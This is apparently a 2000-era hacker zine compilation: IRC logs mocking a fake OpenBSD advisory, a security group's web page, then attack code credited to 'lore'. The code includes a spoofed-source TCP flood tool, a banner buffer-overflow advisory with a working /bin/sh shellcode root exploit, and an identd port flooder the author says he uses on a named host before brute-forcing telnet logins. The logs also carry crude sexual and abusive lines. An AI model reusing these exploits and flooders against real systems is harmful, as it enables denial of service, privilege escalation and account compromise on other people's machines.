\xf9\xed\xf9 SignOff renz: #Phrack (Ping timeout: no data for 250 seconds) \xf9\xed\xf9 Tal_ is now known as Kaki <StJohn> What? The panic-thing? \xf9\xed\xf9 rewben [rewben@d131204.dtk.chello.nl] has joined #openbsd \xf9\xed\xf9 dhartmei [~dhartmei@cable-ggar48-183.intergga.ch] has joined #openbsd \xf9\xed\xf9 SignOff rewben: #OpenBSD (Client Quit) \xf0 Ober_/#openbsd does not see the exploit <Ober_> http://just.rtfm.net/things_that_kill_bsd/ <Ober_> time to add this new one <Ober_> so how the hell is this a "remote" exploit? <Ober_> #hackphreak has too much of an agenda. <dhartmei> still arguing about the fake exploit? :) <Ober_> is it fake? <Ober_> I have not tried it yet <dhartmei> the one that was remove from packetstorm? yes, for exactly that reason. <code9> Ober,me too <code9> #hackphreak article - Section 5 [TO HELL WITH YOU'S]: <code9> Theo de Raadt and the OpenBSD Team <Ober_> yeap <Ober_> "get root remotely" <Ober_> haha <code9> what's mean? <code9> "get root remotely"? <Ober_> yes \xf9\xed\xf9 torqumada [anonymous@paladincorp.com.au] has joined #openbsd <Ober_> it means that they say you can get root on openbsd with this exploit remotely <Ober_> dropping a box to ddb from a ssh login does not count as root <Ober_> :) \xf9\xed\xf9 seiki [seiki@chaotic.darkmind.org] has joined #openbsd <Ober_> if it does actually crash it, then its still a local dos <seiki> morning <Figz> I haven't been able to make it work. <Ober_> morning <dhartmei> it's a simple execlp() bomb, aka forkbomb <Ober_> hey figz <Ober_> figz the bomb? <dhartmei> Figz: remove the user limits :) <Ober_> so its not a real uvm bug? <Figz> There may well be something to it, but that exploit isn't even close to doing anything weird or dangerous. <Ober_> hell I got some of those <dhartmei> no, it's completely fake <Figz> Read the exploit, it does nothing. <Ober_> http://just.rtfm.net/things_that_kill_Bsd <Ober_> http://just.rtfm.net/things_that_kill_bsd <code9> dhartmei,Figz, hi <code9> fake? <Figz> ober, is that the one on bugtraq last night? <Ober_> figz the ones I have no. <Ober_> but some of them do the same thing <Figz> what? <Figz> same thing as the one on bugtraq? <Ober_> I have a sh script that <Ober_> will <Figz> wtf are you talking about, the one on bugtraq doesn't do anything at all <Ober_> well same sort of resource exhaustion <Ober_> mine are mbufs <Ober_> figz ahh.. \xf0 seiki/#openbsd tested it.. did nothing <Figz> "yours" are mbufs? what does this have to do with the one on bugtraq? <Ober_> http://just.rtfm.net/things_that_kill_bsd <code9> dhartmei, this article is only fork bomb? <Ober_> you said that what they had was just a forkbomb. <Figz> ober, I saw the url, you haven't answered my question <Figz> I said no such thing. <Ober_> ok. <Figz> show me where I said this <Figz> and answer my question <dhartmei> code9: i'm not sure we're talking about the same one. but yesterday there was much chattering about one one packetstorm that was completely fake, well, just a forkbomb with exaggerated comments (not remote) \xf9\xed\xf9 SignOff tequiare: #OpenBSD (Ping timeout: no data for 247 seconds) <Ober_> sorry it was dhartmei that said it <code9> dhartmei, aha <Ober_> <dhartmei> it's a simple execlp() bomb, aka forkbomb <Figz> dhartmei, the "exploit" on bugtraq last night doesn't even work as a forkbomb \xf9\xed\xf9 Vik_ [~co@213.237.17.39] has joined #openbsd <Ober_> and I was just commenting that I had a collection of simular scripts <Figz> it would need to write its image back out to a file first <Figz> it doesn't do that <Ober_> ok. I stand corrected. <Figz> instead it casts the data to a struct exec, and then does nothing with that pointer <Figz> ie, it's totally useless, does nothing <Figz> is not obvious how it COULD do anything <dhartmei> oh, there are several, then. a DoS on this channel, at most :) <code9> dhartmei, openbsd able forkbomb attack <Vik_> is 2.8 out ? <code9> use ping <dhartmei> they sound related, they posted to bugtraq first, then extended it and posted it to packetstorm, it seems. the one on packetstorm did execlp() a copy endlessly. <seiki> 2.8 is due out dec 1st. <Vik_> it says on the web page under errata that it is 2.8 <Vik_> yeah <Ober_> they say it was a prank <Ober_> <p0lar> freebased he listen, you shouldnt take that bugtraq thing too serious, its some prank thing against rloxley heh <dhartmei> code9: of course you can forkbomb on obsd, if you don't set user limits. i crashed myself running the thing as non-limited user :) <dhartmei> code9: the same code works on nearly any unix, including Linux for instance. it's a prank. <StJohn> freite: Oh. <code9> dhartmei,yep <Vik_> there is no major change in 2.8 except new drivers , bug fixes ? \xf9\xed\xf9 gaius [info@plan9.hert.org] has joined #phrack <gaius:#phrack> hey! \xf9\xed\xf9 SignOff Pie: #OpenBSD (^B[^BBX^B]^B The birds kept calling his name, thought Caw) \xf9\xed\xf9 krapht [~krapht@ikarus.hardboiledegg.com] has joined #openbsd <gaius:#phrack> jakarta rules <Ober_> figz it works? <gaius:#phrack> if you are interested in remote work or coming here fucking some indonesian pussies.. send bio resume to acz@hert.org <gaius:#phrack> ^G *** OBSDCMNT : shutup fukko *** <noppa> openbsd: (clueless admin required to add holes) <is-> (if you have read through this you have now more reason to switch to Linux). <is-> hahahahahahahhhhh <Figz> We don't get ctcp floods here.. when this channel gets attacked it's usually DDoS... <Ober_> figz did you ever find how to "fix" the bugtrack "sploit" so that it did anything at all? <Figz> ober, the "fix" is "include <sys/stat.h>" <Ober_> ahh <Figz> I just pasted when I was trying it out. <Figz> pastoed even <Ober_> that would just prevent it from compiling thought right? <Figz> that is all <Ober_> so it was just fud then. heh <Figz> no, the exploit works <Ober_> hmm <Figz> not enough sanity checking on the a.out header values <is-> I hope this advisory brings you closer to NT / Linux, rather than <is-> OpenBSD. Linux & NT are way better anyway. <coax> heh. the app guesses where a structure's data is. <is-> LMAO <seiki> what poor lost soul wrote that \xf9\xed\xf9 typo [typo@ingsoc.org] has joined #openbsd <Figz> it's a pretty silly post alright.. \xf9\xed\xf9 Riedel [riedel@oper.irc.emory.edu] has left #openbsd [] <coax> Naw. OpenBSD's the better choice. obviously. heh. <dhartmei> i can part when i see it split <Figz> #2 0xe0127465 in panic (fmt=0xe01e0170 "AMAP_B2SLOT: invalid byte count") at ../../../../kern/subr_prf.c:214 <Figz> #3 0xe01e062e in amap_alloc (sz=4099, padsz=0, waitf=1) at ../../../../uvm/uvm_amap.c:230 <Figz> #4 0xe01e0cf6 in amap_copy (map=0xe277d25c, entry=0xe277ea30, waitf=1, canchunk=1, startva=8192, endva=8193) at ../../../../uvm/uvm_amap.c:603 <Figz> Anyone know any irc.colorado.edu opers? That'd do for getting the channel back.. \xf9\xed\xf9 wkz [wackie@freebsd.org.il] has joined #openbsd \xf9\xed\xf9 wkz [wackie@freebsd.org.il] has left #openbsd [] <slutpuppy> for (i = 0; i > f0rbomb; i++) { Sem_wait(&ptr->mUtEx); printf("my n4m3 is rl0xl3y 4nd 3y3 4m a h4x0r3r %d\n") } exit(0); } \xf9\xed\xf9 bugoid [bug@gecko.roadtoad.net] has joined #openbsd <slutpuppy> :) hello yall <Soal_Reap> what ever -q does.. <mmap`> pthread_join() <dhartmei> it does what man dhcpd says <Soal_Reap> heheh <mmap`> #define NTHREADS 500 <mmap`> ulimit -n 600 <mmap`> ./fokbmb \xf9\xed\xf9 f0rkbomb is now known as sil <sil> www.antioffline.com/er3et.c <--- new OpenBSD advisory (shhhh) <fx> it was fake? i thought it was too stupid to be true <Pie> live <fx> the bug was already fixed though. <bind> yea, it wasnt by rloxley, ssg or anyone <bind> some dude named lore wrote it <bind> to attempt to embarrass some people <fx> oh, lore. <bind> stupid fuck <bind> im pretty pissed off <fx> lore of.. b4b0? <freite> Pie: www.opensound.com <bind> i guess so <bind> some stupid fuck <Wangster> "a smart attacker will.......... walk up to the console...." ROTFL <Wangster> I think if you have an attacker walking up to the console you have much larger problems... haha <rwxr--r--> finished... completely done... www.antioffline.com/er3et.c <Soal_Reap> thnks all fer yer help <rwxr--r--> someone send me a million $US now <rwxr--r--> or i'll post it to bugtraq | rys (rys@supernal.godsey.net) (Internic Network) \xb3 ircname : Joe | channels : #openbsd #Icons_Of_Vanity \xb3 server : irc.east.gblx.net (Global Crossing East Client Server) | away : rys - gone : idle : 1 hours 3 mins 18 secs (signon: Sun Nov 5 22:15:00 2000) <~el81> rys, What happened to all that talk of the bug being only a 'fork() bomb' and calling everyone cluebies, its valid, now give me patches \xf0 dhartmei/#openbsd makes fire to roast the troll <toor> fork bombs can be stopped by limiting resources before the shell is executed <~el81> The bug on bugtraq, I first heard about it on packetstorm <~el81> This really sucks people have crashed two of my machines <~el81> troll? dhartmei, if I recall correctly, you also thought it was a fork() bomb <Figz> 0h H0, 1tz ob3ci4n.. <dhartmei> i still think it is. or does someone _serious_ confirm that the "ehdr->a_data += 3;" is the relevant part of the code. apart from that, it _is_ just a forkbomb, that much i can tell. <~el81> Uh, earlier I saw figz confirm the a_data+=3 is the actual bug. <~el81> He pasted backtrace from what I saw. <obecian> figz: ssg is so pissed about being mentioned in that bogus hp2.adv <Figz> ssg? <obecian> yeah the original advisory that got pulled off packetstorm within a few hours <obecian> subterrain <~el81> You should go crash yourself again. \xf9\xed\xf9 samurii [samuri@shell2.shore.net] has joined #openbsd <Figz> the "advisory" showing up on bugtraq when it did probably got it fixed in 2.8 <john> haha. <Figz> so it's probably just as well. <obecian> figz: yup <~el81> Good, it is patched in 2.8 already? <Figz> yea, 2.8 will be patched <Figz> but it was close <~el81> oh, will be <kajar> er good god, there was actually a bug in that mess? <~el81> Good they released before 2.8 at least <shinobi> that bugtraq post was goofy as shit <shinobi> ppl like to embarrass themselves there <kajar> that adv was totally silly, i still have trouble believing it is real <obecian> shinobi: yeah i wish my name wasn't on there sheesh <fx> Why was your name on there? <obecian> shinobi: the "real" advisory has me on the "fuck-you's" list for reporting the uvm bug too early to theo <fx> Oh. <~el81> Well, all I'm saying is I need patches for 2.7, because these guys are crashing my kernel, anyone have an estimate? <fx> Well, it was all bull. <obecian> yup <fx> "Private release date: Nov 5, 1998". Uh, uvm wasn't even in the tree in 1998. \xf9\xed\xf9 SignOff Ghostwhee: #Phrack (SendQ exceeded) <toor> ~el81 - get out of the shell bizz <obecian> right ;) <~el81> shell bizz? <~el81> oh :) <obecian> and i never mailed theo about a uvm bug, and ssg never helped out with the advisory or code to the advisory \xf9\xed\xf9 SignOff saw: #OpenBSD (night) <obecian> as far as i know hackphreak didn't have anything to do with it... it's someone that is pissed cuz of xlock from a while back <obecian> that could only be adm in my mind <obecian> well whatever, as long as we got something out of it \xf9\xed\xf9 xav [xavier@02-095.063.popsite.net] has joined #openbsd <~el81> Yeah toor, I had to remove three people, for crashing me every minute <ratcorpse> http://www.antioffline.com/er3et.c <ratcorpse> holy fucking cow <toor> eh <seifried> that is so incredibly ugly <john> ratcorpse, don't you have something better to do? <john> printf(*size = d%\nwOrD tO bIgBiRd 3y3 0wN ev3rYtHinG\n); <obecian> too much leet speak for one day =/ <majidf> hehe \xf9\xed\xf9 SignOff obecian: #OpenBSD (end of line) \xf9\xed\xf9 Topic (#OpenBSD): http://www.openbsd.org/errata27.html#execsubr <obecian> did you see the second piece of code off of www.antioffline.com \xf0 jZZzZZz/#openbsd sticks his long hard fat FLAG POLE into the CUNT of #hackphreak <obecian> shit that's horrid <obecian> http://www.antioffline.com/er3et.c <jZZzZZz> As a joke, I'm going to post a letter to Bugtraq about a new vulnerability in OpenBSD..... The one where you can walk up to the console, and take it. <jZZzZZz> The only solution is to use TCFS. <obecian> hahahah \xf9\xed\xf9 SignOff datafirm: #OpenBSD (Read error: 54 (Connection reset by peer)) <jZZzZZz> And of course the OpenBSD developers were hiding this from everyone. <obecian> five finger discount vulnerability <obecian> version 1.0 <obecian> hehe <jZZzZZz> I am working on it nowl. <jZZzZZz> does anyone have an archive of the original lame vulnerability so i can use it as a template for my lame-O advisory ? <SmooveB> do you want that with the 2 blank messages attached (text and html)? <jZZzZZz> i want the fucking advisory <jZZzZZz> asdasfasjfjasajsjoasojasdfojasfd <SmooveB> on its way <jZZzZZz> noi <jZZzZZz> i am stupid and i dont want to learn mutt <jZZzZZz> i am so used to pine that to switch would make my brain leak acids <jZZzZZz> OK, i figured it out <jZZzZZz> they attached the advisory as a separate tex tfile <jZZzZZz> - :Leet Advisory % :Leet Advisory % :Leet Advisory % :Leet Advisory % :Leet - <jZZzZZz> | | <jZZzZZz> | www.dqc.org/~chris | <jZZzZZz> | | <jZZzZZz> | Version : Leet advisory #2666 of many | <jZZzZZz> | Author : LarFoxley[lamedork / condemned / ESP / AH / PPTP (soon)] | <obecian> HAHAHAH <obecian> HAHAHAHHA <jZZzZZz> | Contributed : All of Team Leet (thanks alot) & UVM | <jZZzZZz> | Topic : A non-priviledged user may gain physical access to the | <jZZzZZz> | system, thus exploiting what is known in innner circles as | <jZZzZZz> | "the five-finger discount" | <jZZzZZz> | Effected : All Operating Systems which use a computer | <jZZzZZz> | * OpenBSD, and possibly others | <obecian> HAHAHA <jZZzZZz> | Prvt Release : October 1, 1995 <obecian> hahaha i will laugh if aleph1 lets that through <dxmd> AHHAHHAHAH <dxmd> jZZzZZz: post it to pakcetstorm too since those dorks dont check anything at all <dxmd> ok im off to bed <dxmd> nite all <SmooveB> not enough 0 and 3 and z in there. <jZZzZZz> Shut up Dave, I'm trying to keep true to the original Skript <jZZzZZz> g0tta Keep 1t R3al!#@())!@#( <obecian> yeah noone will believe it's a real advisory with all that proper english <obecian> where's that leetspeak lex filter <dxmd> blame it on obecian <jZZzZZz> I would like to thank bass of BEER. He started the whole OpenBSD <jZZzZZz> religion. Keep up the good work. <jZZzZZz> <jZZzZZz> Special thanks to obecian and his DoS 3.3 System. It has made my <jZZzZZz> job so easy that I think I should not be paid anymore. <jZZzZZz> I would also like to thank: NSA, CIA, FBI, Jammu Siltavuori, <jZZzZZz> Kettutytt, Somali, Dorkex (h0rze :), ISS, Solar Designer, #blowjob, <jZZzZZz> #hotsex, #eatshit, #42, #conf, Al Hugher, Alpeh1, and Jello Biafra. <obecian> AHHAHAHAHA <dxmd> HAHAHHAHAHAHHAHAH <dxmd> man <jZZzZZz> how do you spell diahrheah <jZZzZZz> how do you spell diahrheah <obecian> diarea or diahrea not sure <jZZzZZz> I would also like to thank: NSA, CIA, FBI, Jammu Siltavuori, <jZZzZZz> Kettutytt, Satan, Dorkex (h0rze :), ISS, Solar Designer, #blowjob, <jZZzZZz> #hotsex, #eatshit, #42, #conf, Al Hugher, Alpeh1, communism, the <jZZzZZz> US Air Force, OJ Simpson, Ralph Nader and Jello Biafra. <jZZzZZz> shooop$ grep diah /usr/share/dict/words <jZZzZZz> diaheliotropic <jZZzZZz> diaheliotropically <jZZzZZz> diaheliotropism <jZZzZZz> Obadiah <jZZzZZz> shooop$ grep diarh /usr/share/dict/words <dxmd> this rocks <jZZzZZz> diarhemia <jZZzZZz> fuck <jZZzZZz> @#$@$# <obecian> HAHA <obecian> hahahah <dxmd> um what about chlamidia? <jZZzZZz> whassat? <jZZzZZz> What C code should I put into the new openbsd exploit ? <jZZzZZz> #include <stdyo.h> <jZZzZZz> #include <streengs.h> <jZZzZZz> main() <jZZzZZz> { <jZZzZZz> prentf("hello, world!!!!!\n"); <jZZzZZz> } <jZZzZZz> PS: The expoit is broke very slightly, so it takes some knowledge ;) <jZZzZZz> PUBLIC RELEASE * DO NOT DISTRIBUTE <Figz> Don't forget, private release date: Jan 23, 1979 <jZZzZZz> what's significant about Jan 23, 1979 <Figz> That it's 16 years before openbsd's inception, of course. <jZZzZZz> You want to see what I got now ? <Figz> Yea, "hello world" tekniq.. <jZZzZZz> want me to email you what i got? <jZZzZZz> i ned comments <jZZzZZz> about to go to sleep <jZZzZZz> but i want to fire this off to bugtraq first <jZZzZZz> THIS IS A SERIOUS EXPLOIT PEOPLE!!! <jZZzZZz> BUGTRAQ READERS MUST KNOW ABOUT IT!!!! <jZZzZZz> Fuck this, i'm sending it, gotta go to sleep <jZZzZZz> night night <sean-> wtf is this bullshit i'm reading on bugtraq <mmap`> sean, whats bs? <cripto> fake, obviously. <sean-> the 'openbsd machine can be stolen' advisory <mmap`> rofl <cripto> both are fake. <sean-> i know <sean-> but who the hell would approve that? <cripto> i'm dissapointed that elias approved them <jeremie> aleph1 <jeremie> same guy who approves every other post <cripto> but oh well, he's the moderator. <jeremie> he'll refund your subscription cost if you're pissed <jeremie> i bet <cripto> hah ;) <sean-> haha <sean-> btw cripto sean called me ;) \xf9\xed\xf9 SignOff highvolts: #OpenBSD (return 0;) <mmap`> more like canceling <mmap`> and cp'ing your subscript data to /dev/null <mmap`> yo sean <mmap`> wheres the article <shure> Running make depende echo : is a directory *** Error[1] -- Come one.. <sean-> dunno, it just came through i believe.. <sean-> subject is 'Another OpenBSD vulnerability!!' <dxmd> hahaha <dxmd> hey <dxmd> sean <dxmd> can u do me a favor and give me the url <mmap`> idont see it <dxmd> chris posted that article to prove what a moron aleph1 is <sean-> dxmd: it's in my mailbox, i don't have a url :) <dxmd> people <dxmd> give me the fucking url <dxmd> ok then dcc me <dxmd> ill put it on my site <sean-> ok hang on <Intrinsic> why don't you look at the BugTraq archives? <jeremie> dxmd whats your email <genecyst> dxmd: http://squeamish.org/leet.advisory <dxmd> rat@interniq.org <dxmd> chris rules <zb^3> that advisory is leet <zb^3> -- leet -- leet -- leet -- <zb^3> does Aleph1 even care anymore? <mmap`> HAHAHAHAHA <mmap`> #eatshit <mmap`> dood this faq is the best, mad funny <fx> *** Mode for channel #eatshit is "+tin" <mmap`> Three years without a remote hoe? Strike that. <toor> Subject: ANOTHER OpenBSD security vulnerability!!!! <toor> - :Leet Advisory % :Leet Advisory % :Leet Advisory % :Leet Advisory % :Leet - <sil> hope that wasnt for me toor <sil> ahh yea i read that one but it wasnt me this time <sil> i only write *snicker* real advisories <no_pants> i've got an advisroy <no_pants> i can crack any obsd box <no_pants> all i have to do is sit on it <no_pants> time to email bugtraq! <genecyst> you must be very fat <sil> i can hack openbsd with a jigsaw <no_pants> my ass has no bounds checking [END_CUT] irclogs [CUT_HERE] www.subterrain.net Subterrain.net ____________________________________________________ CAPTION: About It is difficult to describe eloquently the driving forces behind and future goals of the hacker collective known as SSG. We are motivated by the lack of a complete set of solid, portable, and freely available open source tools for performing computer and network security related tasks. Further, we firmly believe that revolutionary R&D is and should increasingly be supported in open, peer-review type arrangements to facilitate unbiased and uncommercialized advancements in data security. CAPTION: News November 7: That "OpenBSD exploit" advisory on bugtraq was fake. We do not know the individual who posted the message. It saddens us to see childish attempts at defamation in public forums. October 15: cripto posts a collection of buffer overflow papers; as well as hardware architecture and assemby language manuals for several architectures (MIPS, PowerPC, PA-RISC, SPARC, and Alpha) - good reading. October 14: aempirei releases libsd, a configurable packet control library for high throughput networks. October 4: aempirei releases his paper "Remote Host-to-Host Path Cost Projection". It describes a method for projection and estimation of remote host-to-host metrics, or path costs in any network. CAPTION: Projects Sentinel - A reference implementation of all publicly known remote promiscuous detection techniques. Siphon - A tool that demonstrates stealth passive network mapping and intel gathering technology. Intravenous - A network packet injection study of expert systems and machine learning over TCP/IP. Architecture Spanning Shellcode - Shellcode that executes on multiple architectures: SPARC, MIPS, and Intel. libsd - A packet control library for BPF platforms. It is designed with high throughput and high-bandwidth networks in mind. Features include a user specified buffer size, a circular buffering method, and extremely low latency function returns. CAPTION: Papers Remote Host-to-Host Path Cost Projection. View. Self Replicating, Self Permutable Code and the Invisible Binary. View. Palante's DEFCON 8 CTF server. View. 802.14 and DOCSIS Standard Information. View. Dynamic Kernel Linker Facility Programming Tutorial by awr. View. Palante's Toorcon 2000 Lecture on Mandatory Access Controls. View. Obecian's Toorcon 2000 Lecture on Intravenous. View. Mike's Toorcon 2000 Lecture on Porting UNIX Network Applications to Win32. View. Bind, aempirei, prole and cripto's Toorcon 2000 Lecture on Passive Network Mapping. View. Awr's Toorcon 2000 Lecture on Dynamic Kernel Linker (KLD) Programming. View. CAPTION: Code spoon - (ab)use dig.cgi to proxy DNS dig requests. silk - simple evasive HTTP packet injection. urlsnuff - urlsnarf remote dos attack (<=dsniff 1.6). grout - A tool for performing geographical traceroutes. PPC shellcode - Palante's shellcode for the PPC. CAPTION: Users aempirei, awr, bind, cripto, dnm, eugene, jeremy, mike, mikep, obecian, pandora, palante, prole. ____________________________________________________ Copyright (c) 2000 Subterrain Security Group. Last updated Wed Sep 6 13:55:17 PDT 2000 . [END_CUT] www.subterrain.net [END_DIR] OpenBSD _______________________ .-' `-. [07]| f1n.c |[07] [07]| by: |[07] [07]| lore |[07] `-._______________________.-' This is private. But now I guess it is public. Also, I would like to give personal thanks to route for LibNET. [BEGIN_DIR] lore [CUT_HERE] f1n.c /* * - Program: fin.c * - Purpose: FIN flooder * - Author: lore <fiddler@antisocial.com> * - Compile: cc -o fin fin.c `libnet-config --defines` -lnet * - Usage: ./fin -h * */ #ifndef __BSD_SOURCE #define __BSD_SOURCE #endif /* Header files */ #include <db.h> #include <netinet/in_systm.h> #include <errno.h> #include <stdio.h> #include <stdlib.h> #include <libnet.h> #include <arpa/inet.h> #include <netdb.h> #include <unistd.h> #include <string.h> #include <sys/signal.h> #include <sys/types.h> #include <sys/socket.h> __BEGIN_DECLS /* Definitions */ #define IP_SIZE (sizeof(struct ip)) #define TCP_SIZE (sizeof(struct tcphdr)) #define TOTAL_SIZE (IP_SIZE + TCP_SIZE) #define TRUE (0x1) #define FALSE (0x0) #define ERR (0xffffffff) /* Data-types */ typedef int sock_t; /* Global variables */ char * packet_buf; FILE * stream; sock_t raw_sock; char * yes = "1"; /* Prototypes */ int main __P ((int, char * *)); void ctrlc __P ((int)); void die __P ((int)); void usage __P ((char *)); char * strip __P ((u_long)); u_long res __P ((char *)); size_t send_fin_packet __P ((u_long)); __END_DECLS /* Functions */ int main (int argc, char * * argv) { u_char * ptr = *argv; u_long victim = ERR; stream = stderr; ++argv; --argc; while (argv && *argv) { if (victim == ERR) { if ((victim = res(*(argv))) == ERR) { fprintf(stderr, "> Bad victim: %s\n", *argv); exit(EXIT_FAILURE); } } else usage(ptr); ++argv; } if (victim == ERR) { usage(ptr); } if (!(packet_buf = (char *)malloc(TOTAL_SIZE))) { fprintf(stream, "> Ran out of memory\n"); exit(EXIT_FAILURE); } if ((raw_sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) == ERR) { fprintf(stream, "> Raw socket could not be created: %s\n", strerror(errno)); exit(EXIT_FAILURE); } else if ( (setsockopt(raw_sock, IPPROTO_IP, IP_HDRINCL, (char *)&yes, sizeof(yes)) == ERR) || (setsockopt(raw_sock, SOL_SOCKET, SO_BROADCAST, (char *)&yes, sizeof(yes)) == ERR) ) { fprintf(stream, "> Could not set socket opts: %s\n", strerror(errno)); exit(EXIT_FAILURE); } fprintf(stream, "> fin.c FIN attack\n"); fprintf(stream, "> author: lore\n"); fprintf(stream, "> victim: %s\n", strip(victim)); signal(SIGINT, ctrlc); fprintf(stream, "> Hit Ctrl-C to abort\n"); while (TRUE) { if (send_fin_packet(victim) == ERR) die(EXIT_FAILURE); } die(EXIT_SUCCESS); } void ctrlc (int useless) { die (EXIT_SUCCESS); } void die (int code) { fprintf(stream, "> Flood ended\n"); shutdown(raw_sock, 2); free(packet_buf); exit(code); } u_long res (char * host) { u_long ipaddr; struct hostent * hp; if ((ipaddr = inet_addr(host)) == ERR) { if (!(hp = gethostbyname(host))) return (FALSE); memcpy(&ipaddr, hp->h_addr, hp->h_length); } return (ipaddr); } char * strip (u_long ipaddr) { struct in_addr addr; addr.s_addr = ipaddr; return (inet_ntoa(addr)); } void usage (char * pname) { fprintf(stream, "Usage: %s <victim>\n", pname); exit(EXIT_SUCCESS); } size_t send_fin_packet (u_long to) { libnet_build_ip(TCP_H, 0, libnet_get_prand(PRu16), 0, 137, IPPROTO_TCP, inet_addr("1.3.3.7"), to, NULL, 0, packet_buf); libnet_build_tcp(0x1337, 80, libnet_get_prand(PRu32), libnet_get_prand(PRu32), TH_ACK|TH_SYN, libnet_get_prand(PRu16), 0, NULL, 0, packet_buf + TCP_H); libnet_do_checksum(packet_buf, IPPROTO_TCP, TCP_H); return libnet_write_ip(raw_sock, packet_buf, TCP_H + IP_H); } [END_CUT] f1n.c ____________________________________ .-' `-. [08]| banner advisory |[08] [08]| by: |[08] [08]| lore |[08] `-.____________________________________.-' Here are some advisories + exploits for banner. Note: banner has to be setuid root for you to get a root shell. I've seen banner setuid root on various .jp systems. Regards -- lore [CUT_HERE] banner.adv ------------------------------------------------------------------------------- | www.insomnia.org/~lore | | | | Topic : A user may become that of another user via 'banner' | | Program : /usr/bin/banner - banner | | Released : 2000-05-21 | | Credits : insomnia.org, r00tabega.com | | Corrected : See below. | | Vender status : Notified | ------------------------------------------------------------------------------- Background information: ----------------------- Banner is a popular tool, used to create banners. Problem description: -------------------- Banner takes a message, and enlarges it based on a width field. Banner may take the message as an argument to main(), or as input() using fgets(). Multiple messages may be included in the banner. Using multiple arguments when executing the program, one can concatenate multiple messages to the banner. When no banner message argument is given, this does not include flags such as the width flag, banner uses standard input. In these two phases, one can exploit banner. The banner 'char message[]' is of a constant MAXMSG. Banner does not take into account bounds checking. By supplying a message, greater than MAXMSG, one can exploit banner. (lore@insomnia~#) banner 10000 A's Segmentation fault Now let's peek at the code. /* Have now read in the data. Next get the message to be printed. */ if (*argv) { strcpy(message, *argv); while (*++argv) { strcat(message, " "); strcat(message, *argv); } nchars = strlen(message); } else { fprintf(stderr,_("Message: ")); (void)fgets(message, sizeof(message), stdin); nchars = strlen(message); message[nchars--] = '\0'; /* get rid of newline */ } Notice the terrible unsafe use of strcpy() and fgets(). One who is aspiring to write secure code, may wish to use the 'n' set of functions. Easily changing strcpy() to strncpy(), with correct use of strncpy(), will fix phase 1. Easily changing fgets() syntax to fgets(message,sizeof(message)-1, ...); will fix phase 2. IMPACT: ------- A malicious user maybe root if banner is setuid root. One may say, banner is undoubtably never setuid root, au contraire it is. Let's take a look at boxes i found with default installment of banner. Slackware 7.0 Linux Operating System # ls -al /usr/bin/banner -rwsr-xr-x 1 root bin 17492 Aug 1 1999 /usr/bin/banner* Solaris 7 Operating System # ls -al /bin/banner -r-sr-xr-x 1 bin bin 6456 Sep 1 1998 /bin/banner FreeBSD 4.0 Operating System, -r-sr-xr-x 1 root wheel 15664 Mar 20 21:31 /usr/bin/banner From the above we conclude that on a Slackware 7.0 Linux Operating System, we may ascertain root privledges. On a Solaris 7 Operating System, we may ascertain bin privledges. On a FreeBSD 4.0 Operating System, we may ascertain root privledges. This vulnerability, in effect, is actually very serious. WORKAROUND: ----------- Install the patches below. Please note that, a patch for strcat() in phase 1 has not been included. patch1_phase1.diff: 1061c1061 < strcpy(message, *argv); --- > strncpy(message, *argv, sizeof(message)-1); patch2_phase2.diff: 1069c1069 < (void)fgets(message, sizeof(message), stdin); --- > (void)fgets(message, sizeof(message)-1, stdin); 1070a1071,1072 > if(nchars > MAXMSG) > nchars = MAXMSG; GREETS: ------- r00tabega, insomnia, w00w00, ADM, USSR Labs, and TREATY [END_CUT] banner.adv [CUT_HERE] bexp.c /* * banner.c exploit * lore * * banner exploit which works with all versions of slackware * * Note: banner has to be setuid root (30% of systems i ran accross had * banner installed suid root) */ #include <stdio.h> #include <stdlib.h> #include <string.h> char hellcode[] = "\xeb\x22\x5e\x89\xf3\x89\xf7\x83\xc7\x07\x31\xc0\xaa" "\x89\xf9\x89\xf0\xab\x89\xfa\x31\xc0\xab\xb0\x08\x04" "\x03\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xd9\xff" "\xff\xff/bin/sh........."; /* * From banner.c */ #define MAXSEG (1024) #define BSIZE (MAXSEG) #define ESIZE ((BSIZE+8)) #define PATH ("/usr/bin/banner") #define OFFSET (400) #define NOP (0x90) int main __P((int, char **)); long get_esp __P((void)); long get_esp(void) { __asm__("movl %esp, %eax"); } int main(int argc, char **argv) { int offset, i, j; long addr; char *evilbanner; evilbanner = (char *) malloc(ESIZE); offset = OFFSET; for (i = 0; i < (ESIZE - strlen(hellcode) - 4); ++i) evilbanner[i] = NOP; for (j = 0; i < (ESIZE - 4); ++j, ++i) evilbanner[i] = hellcode[j]; if (argc > 1) offset = atoi(argv[1]); addr = (get_esp() - offset); *(long *) (evilbanner + i) = addr; fprintf(stderr, "banner exploit, lore\n"); fprintf(stderr, "\nUsing address 0x%x, offset %d\n", addr, offset); execl(PATH, "banner", evilbanner, NULL); } [END_CUT] bexp.c ____________________________________ .-' `-. [09]| identd killer |[09] [09]| by: |[09] [09]| lore |[09] `-.____________________________________.-' I use this on boxes like hackphreak.org. The trick is to kill identd, then they will irc with their real login ID as the userid. Now we can brute force the box with a telnet brute forcer. Regards -- lore [CUT_HERE] identd_kill.c #include <errno.h> #include <stdio.h> #include <string.h> #include <stdlib.h> #include <signal.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <netdb.h> #include <pthread.h> #include <unistd.h> #include <fcntl.h> #define TIMEOUT 4 void * TREATY_kill(struct sockaddr_in *sin) { int sfd, flags; void on_alrm(int s) { close(s); pthread_exit(NULL); } pthread_detach(pthread_self()); //signal(SIGALRM,on_alrm); sfd = socket(AF_INET, SOCK_STREAM, 0); if(sfd < 0) { perror("socket"); pthread_exit(NULL); } //alarm(TIMEOUT); flags = fcntl(sfd, F_GETFL); flags |= O_NONBLOCK; fcntl(sfd, F_SETFL, flags); if(connect(sfd, (struct sockaddr *)sin, sizeof(struct sockaddr_in))<0 && errno != EINPROGRESS) { perror("connect"); pthread_exit(NULL); } pthread_exit(NULL); } int main(int argc, char *argv[]) { struct sockaddr_in sin; pthread_t p; int n,x; bzero(&sin, sizeof(sin)); sin.sin_family = AF_INET; sin.sin_addr.s_addr = inet_addr(argv[1]); sin.sin_port = htons(113); (argc>2)?x=atoi(argv[2]):20; for(;x--;) { n = pthread_create(&p, NULL, (void *)&TREATY_kill, &sin); if(n) { printf("pthread_create erroed or somehting\n"); exit(-1); } pthread_join(p, NULL); } return 1; } [END_CUT] identd_kill.c [END_DIR] lore ____________________________________ .-' `-. [10]| testsyscall |[10] [10]| by: |[10] [10]| Team Hackphreak |[10] 